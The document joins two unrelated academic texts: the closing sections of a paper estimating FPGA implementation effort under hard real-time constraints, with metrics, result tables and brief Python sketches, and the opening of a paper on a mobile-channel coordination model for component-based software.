where $NOP_{opt}(NOO_{PAR})$ expresses the reduction in executed operations in the critical path when $NOO_{PAR}$ optimizations are applied. How to obtain this estimate is further discussed in Section III-C.

All in all this gives:

$$t_{exec}(NOO_{PAR}) = (NOP - NOP_{opt}(NOO_{PAR})) \frac{1}{f_{arch}} \quad (6)$$
3) Case 2: Chaining: Similarly, for chaining we can express the estimated execution time, $t_{exec}(NOO_{Chain})$, as:

$$t_{exec}(NOO_{Chain}) = (NOP - NOP_{opt}(NOO_{Chain})) \frac{1}{f_{arch}} \quad (7)$$

where $NOO_{Chain}$ denotes the number of applied chaining optimizations. Please note that $f_{arch}$, the frequency of the architecture, will typically change when creating larger operators.
4) Case 3: Combined: Combining the parallelized and chained cases leaves us with the following equation:

$$t_{exec}(NOO_{PAR}, NOO_{Chain}) = \left( \frac{NOP}{\gamma_{impl}(NOO_{PAR})} - \frac{NOP_{opt}(NOO_{Chain}|NOO_{PAR})}{\varphi(NOO_{PAR})^{-1}} \right) \frac{1}{f_{arch}} \quad (8)$$

where $\varphi(NOO_{PAR})$ is a parallelism distribution measure which takes into account the fact that a chaining optimisation in the parallel context does not necessarily result in a reduction of the execution time. We discuss this further in Section IV.
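The four cases above can be summarised in a short sketch. The impact terms $NOP_{opt}$ and the measure $\varphi$ are treated as inputs here (they are derived in Sections III-C and IV), and all numeric values are illustrative.

```python
# Sketch of the execution-time estimates of Eqs. 3-8. The impact
# values nop_opt_* and the distribution measure phi are supplied by
# the caller; the operation counts and clock frequency below are
# illustrative placeholders.

def t_seq(nop, f_arch):
    """Eq. 3: sequential execution time."""
    return nop / f_arch

def t_par(nop, nop_opt_par, f_arch):
    """Eq. 6: after a number of parallelization optimisations."""
    return (nop - nop_opt_par) / f_arch

def t_chain(nop, nop_opt_chain, f_arch):
    """Eq. 7: after a number of chaining optimisations."""
    return (nop - nop_opt_chain) / f_arch

def t_combined(nop, gamma_impl, nop_opt_chain, phi, f_arch):
    """Eq. 8: parallelization followed by chaining; the chaining
    gain is scaled by phi (Eq. 8 writes this as division by
    phi^-1)."""
    return (nop / gamma_impl - nop_opt_chain * phi) / f_arch

# Illustrative numbers: 1500 operations at 100 MHz.
assert t_par(1500, 500, 100e6) < t_seq(1500, 100e6)
assert t_combined(1500, 3.0, 100, 1.0, 100e6) < t_chain(1500, 100, 100e6)
```

Walking such a sketch over increasing numbers of optimisations reproduces the optimization paths of Fig. 3: the designer keeps applying optimisations until the estimate drops below $t_c$.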
C. Optimisation Impact Estimation
When implementing an algorithm containing loops, different loops have different numbers of iterations. Typically, loops with large numbers of iterations contribute more to the execution time of the algorithm than loops with small numbers of iterations, and optimizing an operation in a loop with a large number of iterations yields a larger reduction of the execution time. Assuming that the effort required to perform an optimisation does not change with the number of iterations, processing the loops with the largest numbers of iterations first has a larger impact on the reduction of the execution time for a given implementation effort. It is therefore essential to take this into account when estimating the optimisation impact on the execution time.
The real impact of an optimisation on algorithms that include loops cannot be known without deep inspection of the algorithm; however, an approximation would be beneficial. We therefore propose a measure providing such an approximation. The requirements for defining such a measure include that it should reflect the number of executed operations compared to the number of operations that need to be implemented. In Fig. 4 a random algorithm containing loops is considered. The figure shows the relation between the number of optimisations and the corresponding reductions in the executed number of operations. The optimisations are ordered according to their impact on the execution time of the algorithm. The solid line represents the real impact, the dashed line the average, and the dotted line the approximation. The real line corresponds to the case where the optimisations are fully prioritised according to their impact; the average line corresponds to the mean impact of a random optimisation strategy.
One interesting point in the graph in Fig. 4 is the end point. The number of operations which can be parallelized, as well as the number of operations which can be chained, limits the possible number of optimisations. We denote the maximum number of optimisations for the parallel case as:

$$|NOO_{PAR}|_{max} = NOP_{impl} - CP_{impl} \quad (9)$$

where $NOP_{impl}$ represents the number of implemented operations and $CP_{impl}$ the number of implemented operations which are present in the critical path. These numbers are different from $NOP$ and $CP$ when loops are present, since the operations inside a loop are executed several times. Similarly to the measure in Eq. 9, a measure, $NOP_{opt}(|NOO_{PAR}|_{max})$, for the maximum number of executed optimised operations can be calculated. The ratio between these two measures reflects the average impact of the loops present in the algorithm when taking the parallelism into account. This is the slope of the average line in Fig. 4.
A similar approach is used for the chaining case, except that the maximum number of optimisations is calculated as:

$$|NOO_{Chain}|_{max}(NOO_{PAR}) = NOP_{impl} - P(NOO_{PAR}) \quad (10)$$

where $P(NOO_{PAR})$ denotes the number of paths in the algorithm, which is further detailed in Section IV.
It turns out to be difficult to obtain a good and stable first-order approximation of the impact of the loops in the algorithm based on the limited amount of data available to us. We have therefore decided to use the average as the measure for the impact of an optimisation, which can be calculated as:
$$NOP_{opt}(NOO_{PAR}) = \frac{NOP_{opt}(|NOO_{PAR}|_{max})}{|NOO_{PAR}|_{max}} NOO_{PAR} \quad (11)$$

and

$$NOP_{opt}(NOO_{Chain}|NOO_{PAR}) = \frac{NOP_{opt}(|NOO_{Chain}|_{max}(NOO_{PAR}))}{|NOO_{Chain}|_{max}(NOO_{PAR})} NOO_{Chain} \quad (12)$$
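The average impact model of Eqs. 11-12 amounts to a line through the origin and the end point of Fig. 4; a minimal sketch, with illustrative operation counts, follows.

```python
# Sketch of the average impact model of Eqs. 11-12: the impact of
# noo optimisations is approximated by a line from the origin to the
# end point of Fig. 4 (maximum optimisations, maximum reduction).
# All counts below are illustrative placeholders.

def nop_opt_avg(noo, noo_max, nop_opt_max):
    """Average reduction in executed operations after noo
    optimisations (Eqs. 11 and 12 share this linear form)."""
    return nop_opt_max / noo_max * noo

# Eq. 9: at most NOP_impl - CP_impl parallelization optimisations.
nop_impl, cp_impl = 40, 10
noo_par_max = nop_impl - cp_impl
# Illustrative: the fully optimised case removes 900 executed ops.
assert nop_opt_avg(noo_par_max, noo_par_max, 900) == 900
assert nop_opt_avg(15, noo_par_max, 900) == 450
```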
IV. METRICS
A. Metric of distribution of parallelism
When chaining operators, the impact on the execution time depends on whether the optimisations are done in the critical path or in other paths. For this work we expect that the developer has carefully analysed the algorithm and is only optimising where it is most feasible, i.e. in the critical path.

However, chaining operations in the critical path can lead to a situation where the path which was originally the critical one is reduced, due to the optimisations, so that another path becomes the longest one. Fig. 5 shows three different examples, all having 15 nodes and a critical path of 5, which gives a speedup measure γ = 3. Fig. 5a shows an example where the initial critical path (grey) has the same length as the two other paths in the algorithm (highly distributed case). Chaining two operations in the critical path will change the longest path to one of the two others. In contrast, Fig. 5b shows an example where the initial critical path is significantly longer (narrow case), which means that chaining operations in this case will lead to a reduction of operations in the initial critical path. In between, Fig. 5c shows a more average example.
Knowing the graph would make it possible to derive the exact reduction of the algorithm’s critical path with a specific number of chaining optimisations. However, not knowing the graph but only the average speedup, γ, the number of operations and the length of the initial critical path makes it challenging to predict this reduction.
In order to obtain a better estimate of the effect of an average chaining optimisation, we propose a metric which considers the distribution of the parallelism in the algorithm.
It is desirable that such a metric has the following properties: in case of a highly distributed parallelism (see Fig 5b), i.e. many paths in the algorithm, the value of the metric should converge towards one. In case the distribution is “narrow” (see Fig 5a), i.e. the number of paths is equivalent to the speedup, the metric should give a value close to zero.
Most graphs will not fall into the two extremes from Fig 5, but will be more like the average case. In order to obtain the metric of the average contribution of chaining optimisations, we propose a mechanism with which any graph can be transformed and handled as a combination of the two extremes. The transformation is illustrated in Fig 6. The mechanism is as follows: keep the critical path fixed and substitute the off-critical paths (i.e. all paths excluding the critical one) with paths having their average length.
This transformation gives a simplified problem in which chaining can be handled first as the narrow distributed case and then as the highly distributed case. The impact of the chaining optimisation will always be better than or equal to that of this simplified model with the same number of paths. An optimisation following this model is shown in Fig 7.
In order to handle the graph as the narrow distributed case, it is important to know how large the difference between the critical path and the off-critical paths is. To do so we utilize $P(\text{NOO}_{\text{PAR}})$, the number of paths of the parallel-optimised algorithm. The difference between the critical path and the average of the off-critical paths can then be calculated as:
$$M = \left(1 - \frac{\gamma - 1}{P(\text{NOO}_{\text{PAR}}) - 1}\right)CP \quad (13)$$
When the critical path has been reduced to the same length as the average of the off-critical paths, the scenario changes to the highly distributed extreme, and the rest of the chaining optimisations are handled accordingly.
Since most algorithms do not fall into one of the two extremes, when estimating the impact of a certain number of chaining optimisations the average measure is more representative than the measure obtained by considering the two extremes separately.
Furthermore, it can be shown that the real impact from optimisation will be equal to or better than the average of the simplified model\(^1\). Using such a measure will therefore ensure that the estimates of the chaining optimisation impact are not overestimated.
The measure for the impact of a chaining optimisation can therefore be denoted by the following:
\[
\phi(\text{NOO}_{\text{PAR}}) = \left( \frac{M}{\text{NOP}} + \frac{CP - M}{\text{NOP} - M} \right)
\]
(14)
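Eqs. 13 and 14 can be transcribed directly; the function and parameter names below are ours, and the formulas are implemented exactly as printed (`gamma` is the speedup, `num_paths` is P(NOO_PAR), `cp` the critical path length and `nop` the number of operations):

```python
def narrow_difference(gamma, num_paths, cp):
    """Eq. 13: average gap M between the critical path and the off-critical paths."""
    return (1 - (gamma - 1) / (num_paths - 1)) * cp

def chaining_impact(gamma, num_paths, cp, nop):
    """Eq. 14: estimated impact phi of an average chaining optimisation."""
    m = narrow_difference(gamma, num_paths, cp)
    return m / nop + (cp - m) / (nop - m)
```

For the fully distributed example of Fig 5 (γ = 3, three paths, CP = 5, 15 operations), M is 0 and the impact reduces to CP/NOP.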
With all of these defined, we are now ready to find the number of optimisations needed to fulfil the real-time constraint, and to define the metric expressing how hard it is to reach this implementation. We call this metric the implementation hardness.
B. Implementation hardness
Knowing the maximal number of possible optimisations and the minimum needed to meet the time constraint, the ratio between these two (Eq. 15) indicates how much the implementation needs to be investigated. Using the analogy with the implementation tracks, a number close to one indicates that almost all possible optimisations in the algorithm need to be applied, and only a very limited number of tracks will lead to a satisfying solution; finding these solutions will require a lot of effort. On the other hand, a number close to zero indicates that only a few of the possible optimisations are needed, and many tracks will lead to a satisfying solution; less effort is probably needed.
\[
\tau(t_c) = \frac{|\text{NOO}_{\text{PAR,Chain}}(t_c)|_{\text{min}}}{|\text{NOO}_{\text{PAR,Chain}}|_{\text{max}}}
\]
(15)
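A minimal sketch of Eq. 15 (the names are ours); following the later discussion of SS4 and SS5, a value of 1 is also used as an error flag when even the maximally optimised algorithm cannot meet the constraint:

```python
def implementation_hardness(min_needed, max_possible):
    """Eq. 15: tau(t_c) = |NOO_PAR,Chain(t_c)|_min / |NOO_PAR,Chain|_max.

    A value of 1 doubles as an error flag when the time constraint cannot
    be met with the current algorithm (see the SS4/SS5 discussion).
    """
    if min_needed > max_possible:
        return 1.0  # constraint unreachable; algorithm transformation needed
    return min_needed / max_possible
```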
Using \(\tau(t_c)\) in Eq. 2 we are now able to take the implementation hardness into account and thereby refine the estimated implementation effort.
V. RESULTS
Similar to when we developed the implementation effort estimation technique in [3], we will verify the proposed improvement by first building a model on the basis of the same training data as in [3], and then validating the model with a set of validation data, which is also the same as used earlier. By doing so, we can first test the validity of the real-time extension and tune the proposal, and still use the second set of real-life data to evaluate whether it generalises.
To summarize, the training data originates from two different application types that were both developed as academic projects in universities in France. The training data has therefore not been produced specifically for this project, but is comparable to data from industrial projects. The first application is composed of five different video processing algorithms that are able to track moving objects in a video sequence. The second application is a cryptographic system, where we use the cryptographic algorithms MD5, AES and SHA-1, as well as a combined crypto engine, which is also part of the system. The developers for the training data were a Ph.D. student and M.Sc.EE. students, as can be seen in Table I.
The validation data originates from a local company, ETI A/S, which is a Danish SME. The dataset contains algorithms from a state-of-the-art network system and consists of Ethernet applications implemented on FPGAs, as well as corresponding testbeds. The system is a real-time system with hard time constraints, and all algorithms were implemented as to meet these constraints. The developers for the validation data had some experience before starting the implementation as shown in Table I. For more information about the data we would like to point the reader to [3].
A. Training Data
Fig. 8 shows the training data, where the uncorrected complexity, as defined by the number of linearly independent paths (as defined in [3]), is plotted in relation to the needed effort. A small update in the method of measuring the independent paths has been applied compared to [3]: we now only measure the core of the algorithm, i.e. the part going to be implemented on the FPGA, and do not include small fragments of data-formatting code. Taking these data and applying the original experience transformation results in the picture shown in Fig. 9. A least-squares fit trend line can be extracted to form our model (Eq. 1):
\[
\text{Effort} = A(\eta(\text{Dev})) \cdot P(\text{alg})^b
\]
(16)
where the trim parameters \(A = 0.196\) and \(b = 1.191\). This is depicted as the dash-dot-dash line.
In Fig 10, the new parameter \(\tau(t_c)\) taking the real-time constraint into account is applied. The \(\tau(t_c)\) values for the different algorithms are shown in the upper part of Table II. This changes the complexity of the different algorithms a little, and a new least-squares fit line of our model is depicted with the dashed line. The trim parameters of our model (Eq. 2):
\[
\text{Effort} = A(\eta(\text{Dev})) \cdot \left(P(\text{alg}) \cdot \tau(t_c)\right)^b
\]
(17)
are now \(A = 0.209\) and \(b = 1.181\).
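A hedged sketch of the two effort models (Eqs. 16 and 17); we read the real-time model as scaling the complexity by τ(t_c) before applying the exponent, consistent with the statement that τ "changes the complexity", and the trim parameters are those reported above:

```python
def effort_original(a, b, complexity):
    """Eq. 16: Effort = A * P(alg)^b  (A = 0.196, b = 1.191 in the paper)."""
    return a * complexity ** b

def effort_realtime(a, b, complexity, tau):
    """Eq. 17 as we read it: Effort = A * (P(alg) * tau(t_c))^b
    (A = 0.209, b = 1.181 in the paper)."""
    return a * (complexity * tau) ** b
```

With τ(t_c) = 1 (the hardest constraints) the real-time model has the same functional form as the original one.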
A comparison of the two models is shown in Table III, where the model taking the real-time constraint into account performs slightly better. The difference is, however, not statistically significant. We nevertheless continue with the improved model.
B. Validation Data
We continue by validating the correctness of the model using the validation data. In Fig 11, the corrected validation data are shown together with the model, which is depicted by the dashed line, and a 95% confidence interval. Both the model and the confidence interval are extracted from the training data. It is clear that most algorithms fit nicely with the proposed model and are well within the confidence interval. The exceptions are algorithms SS4 and SS5, which we discuss in detail in the next section. The mean and variance of the prediction errors are shown both with and without SS4 and SS5 in Table IV.
C. Discussion of result
Most of the algorithms fit nicely with the proposed model and are well within the confidence interval. The improved model indeed does perform better than the original model, which had a mean error of 0.2 and a variance of 8. Taking a closer look at Table II shows that for all the Ethernet algorithms, except for SS3, we obtain an implementation hardness value $\tau(t_c)$ very close to one. This indicates that the implementations have been very close to the maximum achievable with the algorithm. This fits very well with the knowledge that these algorithms are used in state of the art high performance systems. However, the result for SS3 shows that it should have been possible to choose a less optimised solution and still meet the constraints, which would have resulted in a reduction of the implementation time, at least if the model holds for this algorithm.
Exceptions to these results are the SS4 and SS5 algorithms, where the estimates do not fit the model. Looking at Table II again, we see that their implementation hardness value is set to 1. This is an error value indicating that the time constraint cannot be met with the current algorithm: the algorithm used for estimating the complexity of the implementation, and thereby the needed effort, will not be able to fulfil the requirements, and an algorithm transformation is probably needed. Without going into details, we can say that the final implementations of these two algorithms involve a lot of bit manipulation which is not easily reflected in the initial C algorithm used for the measurement. A safe conclusion is therefore that when the implementation hardness factor indicates the need for an algorithm transformation, the result will hardly be covered by the proposed model.
Furthermore it is also important to stress that our set of data originates from a single company with few developers. So strictly speaking we can only conclude that this model can be applied to the specific SME setup involved in the study and partially to the academic environment studied. A large volume and variety of experimental data for training and validation is needed to generalise our model. Also, the model can be refined with more parameters for more precise results.
VI. CONCLUSION
Accurate development time estimates are an essential tool for project managers working in the embedded systems industry. Obtaining such estimates is challenging and in particular very few existing works can provide hardware implementation effort estimates. In this paper we have presented our contribution to this topic, namely a systematic and structured approach for estimating the hardware implementation effort of hard real-time constrained applications.
The underlying idea of this work is that implementing a system is more difficult when hard real-time constraints must
---
**Table I**
<table>
<thead>
<tr>
<th>Developer</th>
<th>Education</th>
<th>Experience</th>
</tr>
</thead>
<tbody>
<tr>
<td>Dev 1</td>
<td>Ph.D. stud.</td>
<td>0</td>
</tr>
<tr>
<td>Dev 2</td>
<td>Stud. (EE)</td>
<td>0</td>
</tr>
<tr>
<td>Dev 3</td>
<td>Stud. (EE)</td>
<td>0</td>
</tr>
<tr>
<td>Dev 4</td>
<td>Stud. (EE)</td>
<td>0</td>
</tr>
<tr>
<td>Dev 5</td>
<td>BSc.EE.</td>
<td>9</td>
</tr>
<tr>
<td>Dev 6</td>
<td>MSc.EE.</td>
<td>15</td>
</tr>
<tr>
<td>Dev 7</td>
<td>MSc.EE.</td>
<td>9</td>
</tr>
<tr>
<td>Dev 8</td>
<td>MSc.EE.</td>
<td>8</td>
</tr>
<tr>
<td>Dev 9</td>
<td>MSc.EE.</td>
<td>8</td>
</tr>
</tbody>
</table>
**Table II**
<table>
<thead>
<tr>
<th>Algorithm</th>
<th>Complexity</th>
<th>$\tau(t_c)$</th>
<th>Developer</th>
<th>Dev. Exp.</th>
</tr>
</thead>
<tbody>
<tr>
<td>T1</td>
<td>10</td>
<td>0.97</td>
<td>Dev 1</td>
<td>2</td>
</tr>
<tr>
<td>T2</td>
<td>24</td>
<td>0.99</td>
<td>Dev 1</td>
<td>10</td>
</tr>
<tr>
<td>T3</td>
<td>12</td>
<td>0.91</td>
<td>Dev 1</td>
<td>18</td>
</tr>
<tr>
<td>T4</td>
<td>14</td>
<td>0.96</td>
<td>Dev 2</td>
<td>1</td>
</tr>
<tr>
<td>T5</td>
<td>4</td>
<td>0.89</td>
<td>Dev 1</td>
<td>20</td>
</tr>
<tr>
<td>MD5</td>
<td>10</td>
<td>0.98</td>
<td>Dev 3</td>
<td>1</td>
</tr>
<tr>
<td>AES</td>
<td>10</td>
<td>0.99</td>
<td>Dev 4</td>
<td>8</td>
</tr>
<tr>
<td>SHA-1</td>
<td>27</td>
<td>0.98</td>
<td>Dev 4</td>
<td>14</td>
</tr>
<tr>
<td>Combined</td>
<td>59</td>
<td>0.99</td>
<td>Dev 4</td>
<td>14</td>
</tr>
<tr>
<td>SS1</td>
<td>25</td>
<td>0.99</td>
<td>Dev 6, 7</td>
<td>150</td>
</tr>
<tr>
<td>SS2</td>
<td>35</td>
<td>0.98</td>
<td>Dev 5</td>
<td>150</td>
</tr>
<tr>
<td>SS3</td>
<td>17</td>
<td>0.26</td>
<td>Dev 5, 6, 7, 8</td>
<td>150</td>
</tr>
<tr>
<td>SS4</td>
<td>50</td>
<td>1</td>
<td>Dev 6</td>
<td>6</td>
</tr>
<tr>
<td>SS5</td>
<td>29</td>
<td>1</td>
<td>Dev 7</td>
<td>3</td>
</tr>
<tr>
<td>SS6</td>
<td>25</td>
<td>0.99</td>
<td>Dev 5, 6, 7</td>
<td>3</td>
</tr>
<tr>
<td>Ethernet app</td>
<td>60</td>
<td>0.99</td>
<td>Dev 5, 6, 7, 8, 9</td>
<td>150</td>
</tr>
<tr>
<td>App 4</td>
<td>9</td>
<td>0.94</td>
<td>Dev 6</td>
<td>150</td>
</tr>
</tbody>
</table>
**Fig. 8.** Relation between the implementation effort [number of weeks] and the uncorrected complexity.
be fulfilled, since designers have to identify the suitable implementation track(s) that lead to a satisfying solution. We have proposed an optimisation model which takes some of the most common optimisation techniques into account, as well as the order in which they are applied. In particular we have suggested a set of two metrics which are used to characterise the effects of optimisations. The first one, the implementation hardness metric, reflects how hard it is to reach an implementation satisfying the real-time constraints for the application. The second one, the parallelism distribution metric, reflects how the distribution of parallelism in an algorithm influences the impact of the optimisations. The experimental results are not unambiguous: for the model, the major improvement in accuracy comes from refining the way the complexity of the training data is measured compared to our prior work. A small and not statistically significant improvement comes from applying the implementation hardness measure. When validating the model with the validation data,

Fig. 9. Relation between the implementation effort [number of weeks] and the complexity corrected according to the designers experience model.

Fig. 10. Relation between the implementation effort [number of weeks] and the complexity corrected according to the designers experience model and the hardness of meeting the real-time constraint.
### TABLE III
<table>
<thead>
<tr>
<th>Algorithm</th>
<th>Original Model Error</th>
<th>New Model Error</th>
</tr>
</thead>
<tbody>
<tr>
<td>T1</td>
<td>0.67</td>
<td>2.19</td>
</tr>
<tr>
<td>T2</td>
<td>1.38</td>
<td>3.29</td>
</tr>
<tr>
<td>T3</td>
<td>-0.82</td>
<td>-1.56</td>
</tr>
<tr>
<td>T4</td>
<td>-2.96</td>
<td>-4.45</td>
</tr>
<tr>
<td>T5</td>
<td>-1.53</td>
<td>-3.14</td>
</tr>
<tr>
<td>MD5</td>
<td>0.09</td>
<td>0.51</td>
</tr>
<tr>
<td>AES</td>
<td>2.57</td>
<td>6.65</td>
</tr>
<tr>
<td>SHA-1</td>
<td>2.10</td>
<td>5.28</td>
</tr>
<tr>
<td>Combined</td>
<td>-1.40</td>
<td>-2.83</td>
</tr>
</tbody>
</table>
Mean (Variance): Original model 1.50 (3.39); New model 1.42 (3.07)
### TABLE IV
<table>
<thead>
<tr>
<th>Algorithm</th>
<th>Estimation Error</th>
</tr>
</thead>
<tbody>
<tr>
<td>SS1</td>
<td>-0.14</td>
</tr>
<tr>
<td>SS2</td>
<td>0.91</td>
</tr>
<tr>
<td>SS3</td>
<td>2.71</td>
</tr>
<tr>
<td>SS4</td>
<td>-9.64</td>
</tr>
<tr>
<td>SS5</td>
<td>-8.04</td>
</tr>
<tr>
<td>SS6</td>
<td>0.19</td>
</tr>
<tr>
<td>Ethernet app</td>
<td>0.90</td>
</tr>
<tr>
<td>App 4</td>
<td>0.96</td>
</tr>
</tbody>
</table>
Mean (Variance): -1.56 (22.02)
Mean without SS4 and SS5 (Variance): 0.92 (0.98)
most of the data confirm the model and fit it very well. A mean error of 0.92 weeks (variance 0.98) is achieved when not considering two outlying data points, for which our implementation hardness measure indicates that the time constraint cannot be met. A strong algorithm transformation is probably needed in these cases, and a safe conclusion is therefore that the proposed model will hardly cover them.
In order to strengthen the results, this work needs to be evaluated with more cases. The work would also benefit from incorporating other optimisation strategies, such as pipelining.
REFERENCES
|
A Component Coordination Model Based on Mobile Channels
Juan Guillen-Scholten∗
Farhad Arbab∗
Frank de Boer∗
CWI, P.O. Box 94079, NL-1090 GB Amsterdam, The Netherlands
{juan, farhad, frb}@cwi.nl
Marcello Bonsangue∗†
LIACS, Leiden University, P.O. Box 9512, 2300 RA Leiden, The Netherlands
marcello@liacs.nl
Abstract. In this paper we present a coordination model for component-based software systems based on the notion of mobile channels, define it in terms of a compositional trace-based semantics, and describe its implementation in the Java language. Channels allow anonymous, point-to-point communication among components, while mobility allows dynamic reconfiguration of channel connections in a system. This model supports dynamic distributed systems where components can be mobile. It provides an efficient way of interaction among components. Furthermore, our model provides a clear separation between the computational part and the coordination part of a system, allowing the development and description of the coordination structure of a system to be done in a transparent and exogenous manner. Our description of the Java implementation of this coordination model demonstrates that it is self-contained enough for developing component-based systems in object-oriented languages. However, if desired, our model can be used as a basis to extend other models that focus on other aspects of components that are less concerned with composition and coordination issues.
∗This work is partially funded by the OMEGA project on Correct Development of Real-Time Embedded Systems, EU Project IST-2001-33522.
†Corresponding author
†The research of Dr. Bonsangue has been made possible by a fellowship of the Royal Netherlands Academy of Arts and Sciences.
1. Introduction
In the last decades, structured software development has emerged as the means to control the complexity of systems. However, concepts like modularity and encapsulation alone have shown to be insufficient to support easy development of large software systems. Ideally, large software systems should be built through a planned integration of perhaps pre-existing components. This means not only that components must be pluggable, but also that there must be a suitable composition mechanism enabling their integration.
Component-based software describes a system in terms of components and their connections. Components are black boxes, whose internal implementation is hidden from the outside world. Instead, the composition of components is defined in terms of their (logical) interfaces which describe their externally observable behavior. By hiding all of its computation in components, a system can be described in terms of the observable behavior of its components and their interactions. As such, component-based software provides a high-level abstract description of a system that allows a clear separation of concerns for its coordination and its computational aspects. The importance of such high level logical descriptions of systems is growing in the Software Engineering community. For example, in the standard OO modeling language UML [8] extensions are now emerging to support logical entities as components, their interfaces, and connectors, which allow a logical decomposition and description of a system. An example of such an extension is UML-RT[26], which is an integration of the architectural description language ROOM[27] into UML.
In this paper we present and advocate a coordination model for component-based software that is based on mobile channels, give its description in terms of a transition system, and describe its implementation in the object-oriented language Java. A mobile channel is a coordination primitive that allows anonymous point-to-point communication between two components, and enables dynamic reconfiguration of channel connections in a system. It also supports dynamic distributed systems where components can be mobile.
From a software development point of view, mobile channels provide a highly expressive data-flow architecture for the construction of complex coordination schemes, independent of the computation parts of components. This enhances the re-usability of systems: components developed for one system can easily be reused in other systems with different (or the same) coordination schemes. Also, a system becomes easier to update: we can replace a component with another version without having to change any other component or the coordination scheme in the system. Moreover, a coordination scheme that is independent of the computation parts of components can also be updated without the necessity to change the components in the system.
The Java implementation presented in this paper provides a general framework that integrates a highly expressive data-flow architecture for the construction of coordination schemes with an object-oriented architecture for the description of the internal data-processing aspects of components.
The rest of this paper is organized as follows. In section 2 we discuss components and several coordination mechanisms for their composition, and present our rationale for a model based on channels. In section 3, we introduce and show the advantages of the notion of mobility for channels. In section 4, we give a compositional trace-based semantics for our model. In section 5 we describe an implementation of our model in the Java language [18]. We conclude in section 6, where we discuss related work.
2. Components and their Composition
In this section we briefly discuss the general notion of a component, the integration of components with object-oriented technology, and coordination mechanisms for composing components.
2.1. Components and their Interfaces
We define a component as a black-box entity that can be used (composed) by means of its interface only. Such an interface describes the input, output, and the observable behavior of the component. For example, the interface of a component may tell us that, given a specific input, a window with a message will appear on the screen. However, how this is implemented in the component is hidden from the outside world, i.e., a component is viewed as a black box. An interface of a component, therefore, provides an abstraction of the component which encapsulates its internal implementation details that are not relevant for its use.
In our channel-based coordination model a component interface consists of a set of mobile channel-ends through which a component sends and receives values. This set can be static or dynamic. The observable behavior can be expressed by using, for example, predicates, comments, or some graphical notation, e.g., protocol state machines as defined in UML. In section 4 we express the external observable behavior of a component in terms of a compositional trace-based semantics.
2.2. Integration of Components with Object-Oriented Technology
Components adhere to the fundamental principles that are the underpinnings of object-oriented technology:
- systemwide unique identity;
- bundling of data and functions manipulating those data;
- encapsulation for hiding detailed information that is irrelevant to its environment and other components.
However, components extend these principles by adhering to a stronger notion of encapsulation. Whereas the interface of an object involves only a one-way flow of dependencies from the object providing a service to its clients, an interface of a component involves a two-way reciprocal interaction between the component and its environment. This stronger notion of encapsulation accommodates a more general notion of re-usability because mutual dependencies are now more explicit through component interfaces. Furthermore, it allows components to be independently developed, without any knowledge of each other.
Components are self contained binary packages. Objects that are used to implement a component should not cross the component boundaries. No other restrictions are imposed on a component implementation.
The Java implementation of our coordination model, presented in section 5, demonstrates that object-oriented languages are well-suited to implement components and their composition. This implementation ensures the stronger notion of encapsulation needed for components, allowing access to a component only through its interface (which is a set of mobile channel-ends).
2.3. Coordination Among Components
Besides components, a system also needs connections among them. There are several coordination mechanisms for composing components. Because components must be pluggable, it is important that these mechanisms do not require a component to know anything about the structure of the system they are plugged into. We discuss four important types of coordination mechanisms: messaging, events, shared data spaces, and channels [2].
**Messaging.** With this type of connection, components send messages to each other. These messages need not be explicitly targeted; a component can send a message meant for any component having some kind of specific service (publish-and-subscribe model), instead of sending it to a particular component (point-to-point model). However, messaging is not really suitable for component-based software because it requires the components to know something about the structure of the system: even if they do not directly know their service providers, they must know the services provided in the system. An implementation example of this type of connection is the Java Message Queue (JMQ) [29], a package based on the Java Message Service (JMS) [30] open standard. The Microsoft Message Queuing Services [15] for COM+ [22], is another example.
**Events.** With the event mechanism a component, called the producer or event source, can create and fire events, the events are then received by other components, called consumers or event listeners, that listen to this particular kind of events. JavaBeans [19], which are seen as the components in Java, use the event mechanism.
**Shared data spaces.** In a shared data space, all components read and write values, usually tuples like in Linda [9], from and to a shared space. The tuples contain data, together with some conditions. Any component satisfying these conditions can read a tuple; tuples are not explicitly targeted. The JavaSpaces technology [10], a powerful Jini service from Sun, is an example of a shared data space that is being used for components. Lime [24] (Linda in a Mobile Environment), is a Linda middleware that can also be used for components, especially if these are mobile.
**Channels.** A channel, see figure 1, is a one-to-one connection that offers two ends to components, either a source- or a sink-end. A component can write by inserting values to the source-end, and read by removing values from the sink-end of a channel; the data-flow is locally one way: from a component into a channel or from a channel into a component. The communication is anonymous: the components do not know each other, only the channel-ends they have access to. Channels can be synchronous or asynchronous, mobile, with conditions, etc. Examples of systems based on channels include: Communicating Threads for Java [16], CSP for Java [31], both based on the CSP model [17], and Pict [25], a concurrent programming language based on the π-calculus. However, these systems either do not support distributed environments, or their channels are not mobile. MoCha [12, 7] and Nomadic Pict [32], a distributed version of Pict, do implement distributed mobile channels. However, the channels of Nomadic Pict do not have two distinct ends as defined above and are only synchronous. We explain MoCha in more detail in section 5.2.
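As a hypothetical sketch (ours, not the MoCha or JCSP API), an asynchronous FIFO channel with distinct source- and sink-ends can be modelled as follows; components hold only channel-ends, so communication stays anonymous and the data-flow is locally one-way:

```python
import queue

class SourceEnd:
    """The writing end of a channel: data flows only *into* the channel."""
    def __init__(self, buf):
        self._buf = buf
    def write(self, value):
        self._buf.put(value)

class SinkEnd:
    """The reading end of a channel: data flows only *out of* the channel."""
    def __init__(self, buf):
        self._buf = buf
    def read(self):
        return self._buf.get()

class Channel:
    """An asynchronous FIFO channel offering a source-end and a sink-end."""
    def __init__(self):
        buf = queue.Queue()          # unbounded FIFO buffer
        self.source = SourceEnd(buf)
        self.sink = SinkEnd(buf)
```

A component is handed only `channel.source` or `channel.sink`, never the channel or the component at the other end.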

We base our coordination model on (mobile) channels. The last three coordination mechanisms support true separation of coordination and computation concerns in a system. However, channels share many of the architectural strengths of events and shared data spaces while offering some additional benefits. Four of these benefits are: efficiency, security, architectural expressiveness, and transparent exogenous coordination.
First, although shared data spaces are useful in network architectures like blackboard systems, for most networks, like messaging, point-to-point channels can be implemented more efficiently in distributed systems. In shared data space models, the coordination middleware itself cannot generally know the potential receiver(s) of a message at the time that it is produced; any present or future entity with access to the shared data space can be the consumer of this message. In contrast, a channel-based coordination middleware always knows the connection at the opposite end of a channel, even if it changes dynamically. This additional piece of information allows the middleware to more efficiently implement the appropriate data transfer protocols.

Second, like messaging and events, point-to-point channels support a more private means of communication that prevents third parties from accidentally or intentionally interfering with the private communication between two components. In contrast, shared data spaces are in principle “public forums” that allow any component to read any data they contain. Accommodating private communications within the public forum of a shared data space places an extra burden on many applications that require it.

